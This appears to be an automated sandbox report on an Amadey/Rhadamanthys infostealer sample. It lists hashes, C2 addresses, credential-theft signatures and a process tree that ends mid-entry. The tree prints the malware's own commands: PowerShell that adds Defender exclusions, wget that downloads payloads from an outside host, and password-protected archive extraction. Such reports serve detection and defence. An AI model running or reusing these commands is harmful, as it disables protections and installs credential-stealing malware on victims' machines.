amadey | 3f80c20fecafcfa264532eae938edb81dd04c8d0335c366f0b3c4c64ad529967

Resubmissions

22-05-2024 00:08

240522-ae8cwaee3v 10

Analysis

max time kernel
67s
max time network
91s
platform
windows10-2004_x64
resource
win10v2004-20240426-en
resource tags

arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
submitted
22-05-2024 00:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Launcher.exe
Size

364KB
MD5

93fde4e38a84c83af842f73b176ab8dc
SHA1

e8c55cc160a0a94e404f544b22e38511b9d71da8
SHA256

fb07af2aead3bdf360f555fc872191e43c2f0acbfc9258435f9a30afe272ba03
SHA512

48720aebe2158b8a58fc3431c2e6f68271fbade51303ad9cb5b0493efaec6053ff0c19a898841ef7c57a3c4d042ac8e7157fb3dc79593c1dfcdcf88e1469fdec
SSDEEP

6144:MpS9kEFKbITUvR8cy8dzQ7Lcf3Si96sfO+2RZrTql9unNrkYqliwrqH1JWP6f:Mp8KLBzQ7Lcf3SiQs2FTTql9unNrkvT2

Score

10^/10

amadey rhadamanthys 28ef06 evasion execution persistence spyware stealer trojan upx

Malware Config

Extracted

Family

amadey

Version

4.19

Botnet

28ef06

http://185.196.10.188

http://45.159.189.140

http://89.23.103.42

Attributes

install_dir
b4e248fdbd
install_file
Dctooux.exe
strings_key
01edd7c913096383774168b5aeebc95e
url_paths
/hb9IvshS/index.php

/hb9IvshS2/index.php

/hb9IvshS3/index.php

rc4.plain

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
stealer rhadamanthys
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

plugin4559

description pid process target process

PID 1236 created 2760 1236 plugin4559 sihost.exe
Blocklisted process makes network request 2 IoCs

Processes:

rundll32.exe

flow pid process

63 1068 rundll32.exe
64 1068 rundll32.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Start PowerShell.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

pid process

1796 powershell.exe
2716 powershell.exe
4620 powershell.exe
3528 powershell.exe
Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002
Reads WinSCP keys stored on the system 2 TTPs
Tries to access WinSCP stored sessions.
spyware stealer

Data from Local System
T1005

Credentials in Registry
T1552.002
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

description	pid	process	target process
PID 1236 created 2760	1236	plugin4559	sihost.exe

flow	pid	process
63	1068	rundll32.exe
64	1068	rundll32.exe

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\services\2plugin29017	upx
behavioral3/memory/1520-125-0x0000000140000000-0x0000000140E43000-memory.dmp	upx
behavioral3/memory/2476-221-0x0000000140000000-0x0000000140E43000-memory.dmp	upx

Downloads MZ/PE file

Checks computer location settings 2 TTPs 5 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Launcher.exe3plugin14170Dctooux.exeLauncher.exeLaunhcer.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation	Launcher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation	3plugin14170
Key value queried	\REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation	Dctooux.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation	Launcher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation	Launhcer.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

2plugin29017

pid process

1520 2plugin29017
1520 2plugin29017
Drops file in Windows directory 1 IoCs

Processes:

3plugin14170

description ioc process

File created C:\Windows\Tasks\Dctooux.job 3plugin14170

pid	process
1520	2plugin29017
1520	2plugin29017

description	ioc	process
File created	C:\Windows\Tasks\Dctooux.job	3plugin14170

Executes dropped EXE 12 IoCs

Processes:

Launhcer.exeLauncher.exewget.exewinrar.exeplugin4559wget.exewinrar.exe2plugin29017wget.exewinrar.exe3plugin14170Dctooux.exe

pid	process
3652	Launhcer.exe
2164	Launcher.exe
4728	wget.exe
3620	winrar.exe
1236	plugin4559
592	wget.exe
5072	winrar.exe
1520	2plugin29017
2728	wget.exe
4320	winrar.exe
1348	3plugin14170
1940	Dctooux.exe

Launches sc.exe 9 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

2320 sc.exe
1688 sc.exe
1076 sc.exe
1372 sc.exe
2408 sc.exe
1860 sc.exe
452 sc.exe
3708 sc.exe
1660 sc.exe
Loads dropped DLL 5 IoCs

Processes:

rundll32.exerundll32.exerundll32.exerundll32.exerundll32.exe

pid process

3148 rundll32.exe
3660 rundll32.exe
1068 rundll32.exe
3136 rundll32.exe
4872 rundll32.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
2320	sc.exe
1688	sc.exe
1076	sc.exe
1372	sc.exe
2408	sc.exe
1860	sc.exe
452	sc.exe
3708	sc.exe
1660	sc.exe

pid	process
3148	rundll32.exe
3660	rundll32.exe
1068	rundll32.exe
3136	rundll32.exe
4872	rundll32.exe

Program crash 24 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
4116	1236	WerFault.exe	plugin4559
4872	1348	WerFault.exe	3plugin14170
4664	1348	WerFault.exe	3plugin14170
2076	1348	WerFault.exe	3plugin14170
4264	1348	WerFault.exe	3plugin14170
4940	1348	WerFault.exe	3plugin14170
3160	1348	WerFault.exe	3plugin14170
1884	1348	WerFault.exe	3plugin14170
3712	1348	WerFault.exe	3plugin14170
4620	1348	WerFault.exe	3plugin14170
4016	1348	WerFault.exe	3plugin14170
2728	1348	WerFault.exe	3plugin14170
1688	1940	WerFault.exe	Dctooux.exe
3660	1940	WerFault.exe	Dctooux.exe
1148	1940	WerFault.exe	Dctooux.exe
3252	1940	WerFault.exe	Dctooux.exe
2224	1940	WerFault.exe	Dctooux.exe
4404	1940	WerFault.exe	Dctooux.exe
4688	1940	WerFault.exe	Dctooux.exe
1596	1940	WerFault.exe	Dctooux.exe
1356	1940	WerFault.exe	Dctooux.exe
4264	1940	WerFault.exe	Dctooux.exe
4188	1940	WerFault.exe	Dctooux.exe
784	1940	WerFault.exe	Dctooux.exe

Modifies system certificate store 2 TTPs 5 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

Launcher.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f	Launcher.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 040000000100000010000000c5dfb849ca051355ee2dba1ac33eb028030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f	Launcher.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad040000000100000010000000c5dfb849ca051355ee2dba1ac33eb0282000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f	Launcher.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 5c000000010000000400000000080000040000000100000010000000c5dfb849ca051355ee2dba1ac33eb028030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f	Launcher.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD	Launcher.exe

Suspicious behavior: EnumeratesProcesses 29 IoCs

Processes:

powershell.exepowershell.exeplugin4559dialer.exe2plugin29017powershell.exerundll32.exerundll32.exe

pid	process
1796	powershell.exe
1796	powershell.exe
2716	powershell.exe
2716	powershell.exe
2716	powershell.exe
1236	plugin4559
1236	plugin4559
3656	dialer.exe
3656	dialer.exe
3656	dialer.exe
3656	dialer.exe
1520	2plugin29017
1520	2plugin29017
1520	2plugin29017
4620	powershell.exe
4620	powershell.exe
4620	powershell.exe
1068	rundll32.exe
1068	rundll32.exe
1068	rundll32.exe
1068	rundll32.exe
1068	rundll32.exe
1068	rundll32.exe
4872	rundll32.exe
4872	rundll32.exe
4872	rundll32.exe
4872	rundll32.exe
4872	rundll32.exe
4872	rundll32.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 1796 powershell.exe
Token: SeDebugPrivilege 2716 powershell.exe
Token: SeDebugPrivilege 4620 powershell.exe
Suspicious use of FindShellTrayWindow 10 IoCs

Processes:

wget.exewinrar.exewget.exewinrar.exewget.exewinrar.exe3plugin14170

pid process

4728 wget.exe
3620 winrar.exe
3620 winrar.exe
592 wget.exe
5072 winrar.exe
5072 winrar.exe
2728 wget.exe
4320 winrar.exe
4320 winrar.exe
1348 3plugin14170

description	pid	process
Token: SeDebugPrivilege	1796	powershell.exe
Token: SeDebugPrivilege	2716	powershell.exe
Token: SeDebugPrivilege	4620	powershell.exe

pid	process
4728	wget.exe
3620	winrar.exe
3620	winrar.exe
592	wget.exe
5072	winrar.exe
5072	winrar.exe
2728	wget.exe
4320	winrar.exe
4320	winrar.exe
1348	3plugin14170

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Launcher.exeLaunhcer.exepowershell.exeLauncher.exeplugin45593plugin14170Dctooux.exerundll32.exerundll32.exe

description	pid	process	target process
PID 4528 wrote to memory of 3652	4528	Launcher.exe	Launhcer.exe
PID 4528 wrote to memory of 3652	4528	Launcher.exe	Launhcer.exe
PID 4528 wrote to memory of 3652	4528	Launcher.exe	Launhcer.exe
PID 4528 wrote to memory of 3652	4528	Launcher.exe	Launhcer.exe
PID 4528 wrote to memory of 3652	4528	Launcher.exe	Launhcer.exe
PID 3652 wrote to memory of 1796	3652	Launhcer.exe	powershell.exe
PID 3652 wrote to memory of 1796	3652	Launhcer.exe	powershell.exe
PID 3652 wrote to memory of 1796	3652	Launhcer.exe	powershell.exe
PID 1796 wrote to memory of 2164	1796	powershell.exe	Launcher.exe
PID 1796 wrote to memory of 2164	1796	powershell.exe	Launcher.exe
PID 1796 wrote to memory of 2164	1796	powershell.exe	Launcher.exe
PID 1796 wrote to memory of 2164	1796	powershell.exe	Launcher.exe
PID 1796 wrote to memory of 2164	1796	powershell.exe	Launcher.exe
PID 2164 wrote to memory of 2716	2164	Launcher.exe	powershell.exe
PID 2164 wrote to memory of 2716	2164	Launcher.exe	powershell.exe
PID 2164 wrote to memory of 2716	2164	Launcher.exe	powershell.exe
PID 2164 wrote to memory of 4728	2164	Launcher.exe	wget.exe
PID 2164 wrote to memory of 4728	2164	Launcher.exe	wget.exe
PID 2164 wrote to memory of 4728	2164	Launcher.exe	wget.exe
PID 2164 wrote to memory of 3620	2164	Launcher.exe	winrar.exe
PID 2164 wrote to memory of 3620	2164	Launcher.exe	winrar.exe
PID 2164 wrote to memory of 3620	2164	Launcher.exe	winrar.exe
PID 2164 wrote to memory of 1236	2164	Launcher.exe	plugin4559
PID 2164 wrote to memory of 1236	2164	Launcher.exe	plugin4559
PID 2164 wrote to memory of 1236	2164	Launcher.exe	plugin4559
PID 2164 wrote to memory of 592	2164	Launcher.exe	wget.exe
PID 2164 wrote to memory of 592	2164	Launcher.exe	wget.exe
PID 2164 wrote to memory of 592	2164	Launcher.exe	wget.exe
PID 1236 wrote to memory of 3656	1236	plugin4559	dialer.exe
PID 1236 wrote to memory of 3656	1236	plugin4559	dialer.exe
PID 1236 wrote to memory of 3656	1236	plugin4559	dialer.exe
PID 1236 wrote to memory of 3656	1236	plugin4559	dialer.exe
PID 1236 wrote to memory of 3656	1236	plugin4559	dialer.exe
PID 2164 wrote to memory of 5072	2164	Launcher.exe	winrar.exe
PID 2164 wrote to memory of 5072	2164	Launcher.exe	winrar.exe
PID 2164 wrote to memory of 5072	2164	Launcher.exe	winrar.exe
PID 2164 wrote to memory of 1520	2164	Launcher.exe	2plugin29017
PID 2164 wrote to memory of 1520	2164	Launcher.exe	2plugin29017
PID 2164 wrote to memory of 2728	2164	Launcher.exe	wget.exe
PID 2164 wrote to memory of 2728	2164	Launcher.exe	wget.exe
PID 2164 wrote to memory of 2728	2164	Launcher.exe	wget.exe
PID 2164 wrote to memory of 4320	2164	Launcher.exe	winrar.exe
PID 2164 wrote to memory of 4320	2164	Launcher.exe	winrar.exe
PID 2164 wrote to memory of 4320	2164	Launcher.exe	winrar.exe
PID 2164 wrote to memory of 1348	2164	Launcher.exe	3plugin14170
PID 2164 wrote to memory of 1348	2164	Launcher.exe	3plugin14170
PID 2164 wrote to memory of 1348	2164	Launcher.exe	3plugin14170
PID 1348 wrote to memory of 1940	1348	3plugin14170	Dctooux.exe
PID 1348 wrote to memory of 1940	1348	3plugin14170	Dctooux.exe
PID 1348 wrote to memory of 1940	1348	3plugin14170	Dctooux.exe
PID 1940 wrote to memory of 3148	1940	Dctooux.exe	rundll32.exe
PID 1940 wrote to memory of 3148	1940	Dctooux.exe	rundll32.exe
PID 1940 wrote to memory of 3148	1940	Dctooux.exe	rundll32.exe
PID 2164 wrote to memory of 1236	2164	Launcher.exe	cmd.exe
PID 2164 wrote to memory of 1236	2164	Launcher.exe	cmd.exe
PID 2164 wrote to memory of 1236	2164	Launcher.exe	cmd.exe
PID 1940 wrote to memory of 3660	1940	Dctooux.exe	rundll32.exe
PID 1940 wrote to memory of 3660	1940	Dctooux.exe	rundll32.exe
PID 1940 wrote to memory of 3660	1940	Dctooux.exe	rundll32.exe
PID 3660 wrote to memory of 1068	3660	rundll32.exe	rundll32.exe
PID 3660 wrote to memory of 1068	3660	rundll32.exe	rundll32.exe
PID 1068 wrote to memory of 1800	1068	rundll32.exe	netsh.exe
PID 1068 wrote to memory of 1800	1068	rundll32.exe	netsh.exe
PID 1940 wrote to memory of 3136	1940	Dctooux.exe	rundll32.exe

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:2760
- C:\Windows\SysWOW64\dialer.exe
  "C:\Windows\system32\dialer.exe"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3656

C:\Users\Admin\AppData\Local\Temp\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Launcher.exe"
1⤵
- Checks computer location settings
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:4528
- C:\Users\Admin\AppData\Roaming\services\Launhcer.exe
  "C:\Users\Admin\AppData\Roaming\services\Launhcer.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3652
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "$AdminRightsRequired = $true function Get-Win { while ($true) { # if ($AdminRightsRequired) { # try { Start-Process -FilePath '.\data\Launcher.exe' -Verb RunAs -Wait # break } catch { Write-Host 'Error 0xc0000906' } } else { # break } } } Get-Win"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1796
  - - C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe
      "C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:2164
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath $env:ProgramData, $env:AppData, $env:SystemDrive\ "
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2716
    - - C:\Users\Admin\AppData\Roaming\services\wget.exe
        
        "C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/1/1 -P C:\Users\Admin\AppData\Roaming\services
        5⤵
        Executes dropped EXE
        Suspicious use of FindShellTrayWindow
        
        PID:4728
    - - C:\Users\Admin\AppData\Roaming\services\winrar.exe
        
        "C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\01plugins*.* "plugin*" C:\Users\Admin\AppData\Roaming\services
        5⤵
        Executes dropped EXE
        Suspicious use of FindShellTrayWindow
        
        PID:3620
    - - C:\Users\Admin\AppData\Roaming\services\plugin4559
        
        C:\Users\Admin\AppData\Roaming\services\plugin4559
        5⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:1236
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1236 -s 620
        6⤵
        Program crash
        
        PID:4116
    - - C:\Users\Admin\AppData\Roaming\services\wget.exe
        
        "C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/2/1 -P C:\Users\Admin\AppData\Roaming\services
        5⤵
        Executes dropped EXE
        Suspicious use of FindShellTrayWindow
        
        PID:592
    - - C:\Users\Admin\AppData\Roaming\services\winrar.exe
        
